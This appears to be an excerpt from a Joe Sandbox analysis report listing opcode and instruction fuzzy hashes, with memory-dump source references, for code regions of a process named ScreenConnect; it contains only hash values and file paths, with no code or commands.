                                                                                        • Opcode ID: cff1f73df52a30238ffb440a64fb554e0d49ba424b2e60bf03988a2ee82b7ecb
                                                                                        • Instruction ID: 2e778686d50acec29128230e2f24da28fb727caf0ad16d2b1343e426ee11268d
                                                                                        • Opcode Fuzzy Hash: cff1f73df52a30238ffb440a64fb554e0d49ba424b2e60bf03988a2ee82b7ecb
                                                                                        • Instruction Fuzzy Hash: 6C811812D0E6961FE786BB7C74A19F92F91DF42AA4F0841BAD08DCE0D7DD1C584AC345
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 42d9223a486becc132b4374166685fa0bc51dbe25fa15624ca2634f289c797cb
                                                                                        • Instruction ID: bc99b251fc09fd246cc2594cb44ce021eff9fea9749c73a3a35b29d1b3cbca50
                                                                                        • Opcode Fuzzy Hash: 42d9223a486becc132b4374166685fa0bc51dbe25fa15624ca2634f289c797cb
                                                                                        • Instruction Fuzzy Hash: FD71E272A0C98A8FDBD9EF289455BB577E1FF54740F0401E9D04ECB196DE28E806C784
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c0c0a6cb077ec79a4ee29bbe7489332efbd8701ade544c3843d54b80feb6e1cf
                                                                                        • Instruction ID: fbf2fa654b91ebf9bf3df67b2d3c0ea00d1b445ea9633835a7aa9faa8225771a
                                                                                        • Opcode Fuzzy Hash: c0c0a6cb077ec79a4ee29bbe7489332efbd8701ade544c3843d54b80feb6e1cf
                                                                                        • Instruction Fuzzy Hash: 11817231E9CE078FEBD9F76880556BD66D2EFA4385F544039D44EC36C2DF2CA8428648
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6d7cf2e9a4b28d5396c0589047be2377d193df0b7e9f05345375c2229d2d3b6e
                                                                                        • Instruction ID: 0017abb597fbd2c9baa132eca83e92cfc3895e29d8fd351dc40aecb877c19ab7
                                                                                        • Opcode Fuzzy Hash: 6d7cf2e9a4b28d5396c0589047be2377d193df0b7e9f05345375c2229d2d3b6e
                                                                                        • Instruction Fuzzy Hash: 8F712B71A2CA0A8FEBE9FB58C495BB533D1FF58341F544078E44EC7692DE68E8018784
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 36fa413ae137864a17210e670ff5366ffb6a960b1bd8a41ee59841c7344541b6
                                                                                        • Instruction ID: 827f231df0a40beeafc10230a3cdda6a9789968e3a8a2b92a07acf1ed4e8e936
                                                                                        • Opcode Fuzzy Hash: 36fa413ae137864a17210e670ff5366ffb6a960b1bd8a41ee59841c7344541b6
                                                                                        • Instruction Fuzzy Hash: 4951FE3180CA4A8FE785EF6CE8856F87BE0EF15715F04417AD04AC3193DF28A865CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: feabeb3292f89a5b8203e05b77e5daac9192c7c435874cec558dc69079a7435f
                                                                                        • Instruction ID: 203e53ef177760d75853a5b32fb27f6b2fd261e2d46773f046a372b9a79a152b
                                                                                        • Opcode Fuzzy Hash: feabeb3292f89a5b8203e05b77e5daac9192c7c435874cec558dc69079a7435f
                                                                                        • Instruction Fuzzy Hash: FF41D132E0DE4A8FEB95EB68A8915F97BE1FF94354F04017AE04DC3192DF28A806D744
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 607b0cd8af79f44ec52aafe4504f4b666080cbe988da4e5b7c667892cd2e9a7d
                                                                                        • Instruction ID: 1df05101a804bd4d1886926755f0b8ccab2fbf93d22de05c2f5852be5e9fa95c
                                                                                        • Opcode Fuzzy Hash: 607b0cd8af79f44ec52aafe4504f4b666080cbe988da4e5b7c667892cd2e9a7d
                                                                                        • Instruction Fuzzy Hash: 2151313460CA098FDBDCEF58C49567573E2FB98345B6449A8C059CB68ACB75E883CB84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: eb6d9b08e9f3ffb93c89a88b5364315feab02cf3bb8d202ce523408684d9f0ba
                                                                                        • Instruction ID: 0ae33778f2245f9c01029120d146be012b443f7ea96a25882a12323869a9034c
                                                                                        • Opcode Fuzzy Hash: eb6d9b08e9f3ffb93c89a88b5364315feab02cf3bb8d202ce523408684d9f0ba
                                                                                        • Instruction Fuzzy Hash: 4E410331E1CA8A4FEB89FB2894651F97BA1FF55640F4444BED04AC31C3DE1CA846D345
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d2e5539bb82105f30c4a53ebe923ca69e345f18743d4882fbc7d27ed7a4b2d99
                                                                                        • Instruction ID: 66697b322472e02698d3d3508160f90c46898739a0e91853cd61426dadc2ca07
                                                                                        • Opcode Fuzzy Hash: d2e5539bb82105f30c4a53ebe923ca69e345f18743d4882fbc7d27ed7a4b2d99
                                                                                        • Instruction Fuzzy Hash: DE21D332B0CA061FEF99FA18A4439F573D0FB51790F40412AD48A83583DE1DF8668788
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb87c7c5610142ee1cebe269cd3b49052f890305ccbe571c001efce19f106d51
                                                                                        • Instruction ID: f418778bd68cb0403a6a3fad1e4f1d44a930ce2cf660ec169fee01ffca1eab7c
                                                                                        • Opcode Fuzzy Hash: fb87c7c5610142ee1cebe269cd3b49052f890305ccbe571c001efce19f106d51
                                                                                        • Instruction Fuzzy Hash: 02213572C1D49A4FE380FF7CA8858E837D0EF11B59F088573E19E86083EF1C68659A48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ac5163fd50071738510554184c39af589a4ba6f9af724b31d558c25962575ec5
                                                                                        • Instruction ID: 523d7b0193ee3575cbc5149fad87aac5ba4a9c8b774ea9fdfcc522c3d98aed3a
                                                                                        • Opcode Fuzzy Hash: ac5163fd50071738510554184c39af589a4ba6f9af724b31d558c25962575ec5
                                                                                        • Instruction Fuzzy Hash: 7821F43281D98A4FE380FF7CA8558E97BD0EF12B58F084573D19D8A083EF1C68659A44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 70eea2d8bd2d4c3c6899adcd11d1efeb3ad517a41037f6d903fc492375336a54
                                                                                        • Instruction ID: 2524104ce5dede8aa9eb22b3098c20056ad8f78c0e6b8da636882d58a674de84
                                                                                        • Opcode Fuzzy Hash: 70eea2d8bd2d4c3c6899adcd11d1efeb3ad517a41037f6d903fc492375336a54
                                                                                        • Instruction Fuzzy Hash: 8611E432D4DE8D4FDB95FB2888556B97BE1FFA9340F4400AAD14DC3592CE29A8058385
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2b65a2e061adb40b7e82a5b56b6cdb2775333768cba7a745514c1d5c05fc1086
                                                                                        • Instruction ID: de754433571757b352fdbb8e24a4cc31054ee057696809f2894a1414abc7ee6d
                                                                                        • Opcode Fuzzy Hash: 2b65a2e061adb40b7e82a5b56b6cdb2775333768cba7a745514c1d5c05fc1086
                                                                                        • Instruction Fuzzy Hash: 7E119671D0DA498FEBD5EF6868652B87BF0FF59344F0500AAD158C7693DB285805C705
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9983fe6f4a9e5fa2519dd76922a80d98427db235c1a9fd2340f9ca6bc1d33a80
                                                                                        • Instruction ID: ea205ea462cd9ded51dec9bbb264a0bd31a7a3e1c9ce02474154862289c582bf
                                                                                        • Opcode Fuzzy Hash: 9983fe6f4a9e5fa2519dd76922a80d98427db235c1a9fd2340f9ca6bc1d33a80
                                                                                        • Instruction Fuzzy Hash: DB117F71E08E4A9FE7C9EE18C454A7873D1FBA8704B1405BDD41EC7282CF29A802CB40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c27db71f81ac20a213fc2e51f48cc5d1d5901ed530b0767152cc424d4dd25949
                                                                                        • Instruction ID: a7359aacb3eeda77b5eac114a4b6b00b6f82dfb637c0cf51d2495237fb88e55b
                                                                                        • Opcode Fuzzy Hash: c27db71f81ac20a213fc2e51f48cc5d1d5901ed530b0767152cc424d4dd25949
                                                                                        • Instruction Fuzzy Hash: 71114971A1895A8FDBC8FF288455B7577E1FF68740F0444A8D44ECB286CA2CE8468B84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0c61b87f4c1f5b6cb06e7c3bf331dbbf184c2abb4efbb9adae55109b2017ff23
                                                                                        • Instruction ID: a2fd87637fbf829fe31fd0b4807cf8b444ad1d866ce9fd0178988c712169092a
                                                                                        • Opcode Fuzzy Hash: 0c61b87f4c1f5b6cb06e7c3bf331dbbf184c2abb4efbb9adae55109b2017ff23
                                                                                        • Instruction Fuzzy Hash: 09110221E0CE570FF7A9F32844A13742BE6DF85381F1940BAC409E21D7DE2CAC868709
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 43e91dd30b00bb69d28d51ed3175859eac8a9483afda910c34481fc32d884632
                                                                                        • Instruction ID: b10503c2f77c014a6a2a61e4e2af9609be29f7c4a90cc5017b7dfc74c2dff47b
                                                                                        • Opcode Fuzzy Hash: 43e91dd30b00bb69d28d51ed3175859eac8a9483afda910c34481fc32d884632
                                                                                        • Instruction Fuzzy Hash: DB115B71A1895A4FDBC8FF288054B7577E1FF68740F0440A8D44ECB287CA2CE8068B84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3c40eb45d2a8260987f56d023870bd7a04399f3841917c079b283685a1f8bafd
                                                                                        • Instruction ID: 833bfb3d00a8da39036ceff1161a11a0136c69a580ba3f03f5f1d95143b9e341
                                                                                        • Opcode Fuzzy Hash: 3c40eb45d2a8260987f56d023870bd7a04399f3841917c079b283685a1f8bafd
                                                                                        • Instruction Fuzzy Hash: 52F0303580D68C9FCB86EB64E4919E57FB0FF16310F0541C6E049CB053D7259A59CB82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 80f5bc4245e54437efd39d4384133277597b4738c48cf4bb5145a68eefa1f935
                                                                                        • Instruction ID: e67121d450e1ad27ecc2f438d7386f35f0ca910d5e54df248f46695170320fc8
                                                                                        • Opcode Fuzzy Hash: 80f5bc4245e54437efd39d4384133277597b4738c48cf4bb5145a68eefa1f935
                                                                                        • Instruction Fuzzy Hash: 99E0922140DB944FE396E77498595707FF0DF5611070A42EBD4C8CB1A3D6090C848741
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48f7facd008837354f7827ac7e81c08b74c262a6df1775f1fcd54c8f38b68447
                                                                                        • Instruction ID: d596c5df8badb125d27111193fc7c3ed3b1b796b626d3b913e4fb04f2f3ee11c
                                                                                        • Opcode Fuzzy Hash: 48f7facd008837354f7827ac7e81c08b74c262a6df1775f1fcd54c8f38b68447
                                                                                        • Instruction Fuzzy Hash: 98E0C21694DE130BFBACB27574923B5A0C88F443D1F09507AD41DE00C5DE5C9C858599
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: eefe138075eaba5d54a35c40577db498e02fd38d54754576de53fb7e67d15f49
                                                                                        • Instruction ID: f6e4b2a8d6203b09a411732511ffcd8ff44d3a8c6b3f653e62be6032431d8ef2
                                                                                        • Opcode Fuzzy Hash: eefe138075eaba5d54a35c40577db498e02fd38d54754576de53fb7e67d15f49
                                                                                        • Instruction Fuzzy Hash: 1CD09252F1A89E0AA1D8B56C38562F812C2E798AE0B9405A2E80AD324DED4D0C8362C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f4065effa05a12c2bdf7dbbe22b1e9724e17f329722982933a83559d50a3712a
                                                                                        • Instruction ID: aa8e29425db28aaf3ab0353c0f1458251486fb814dce8a3ff63e0bc9f44da839
                                                                                        • Opcode Fuzzy Hash: f4065effa05a12c2bdf7dbbe22b1e9724e17f329722982933a83559d50a3712a
                                                                                        • Instruction Fuzzy Hash: 32D05E24958C0A4BDB88B729D858D7032D0FB68201FD800A4D80DC61A0EE1DDDC4D685
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4fcb37c59fa2255ee50744da79eb8f9b9de83c362f15656f8dac14f894bf12bc
                                                                                        • Instruction ID: 672227741cbf74f133e481e40ec363a33c11300c6138e43c59d64bda825d821e
                                                                                        • Opcode Fuzzy Hash: 4fcb37c59fa2255ee50744da79eb8f9b9de83c362f15656f8dac14f894bf12bc
                                                                                        • Instruction Fuzzy Hash: 2EE0122114F6C54FD756F73488AC8947FA1EF2715074900FEC545CB1B3EA199849C741
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 446c33c570d02f5e51a0788f6bdf7190d5a3dd315aa22c259da2f0942a342294
                                                                                        • Instruction ID: 4fcb73146641b13623208f641b84d7d5d58d0cbd2344eb27d4925312a2e6a961
                                                                                        • Opcode Fuzzy Hash: 446c33c570d02f5e51a0788f6bdf7190d5a3dd315aa22c259da2f0942a342294
                                                                                        • Instruction Fuzzy Hash: ECD0A77160E9884FDB59FB39885CCB43F80EE2635174900FED446CB5B3E919D988C751
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c3e6b991792920ba0bfc6d869090f8c3181dcab0cfa03e9ade1491b691d05da2
                                                                                        • Instruction ID: 0bdce4dc10ce255fca9559193d4a7ce340a3f51b59d600ccf6832283ac7b7078
                                                                                        • Opcode Fuzzy Hash: c3e6b991792920ba0bfc6d869090f8c3181dcab0cfa03e9ade1491b691d05da2
                                                                                        • Instruction Fuzzy Hash: 28C0122191C81D4EF3B4BAB8744D5B0B5D0DB68251B100576D89DC2299EA181CC047C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.3301601974.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff848ce0000_ScreenConnect.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 12135e5d7ab0f69b130d91f7a599eb84f2ea9fc966db34b3b22ddce6d13c0c7f
                                                                                        • Instruction ID: f796e4ae5d2a2050ad794a85641691f3181c52617b48bbacb12a33aa93f18d84
                                                                                        • Opcode Fuzzy Hash: 12135e5d7ab0f69b130d91f7a599eb84f2ea9fc966db34b3b22ddce6d13c0c7f
                                                                                        • Instruction Fuzzy Hash: 2BC09B14F1CD474FF285FB24444527D15D26F88342F945435F00DC1187CF3CA5015A4D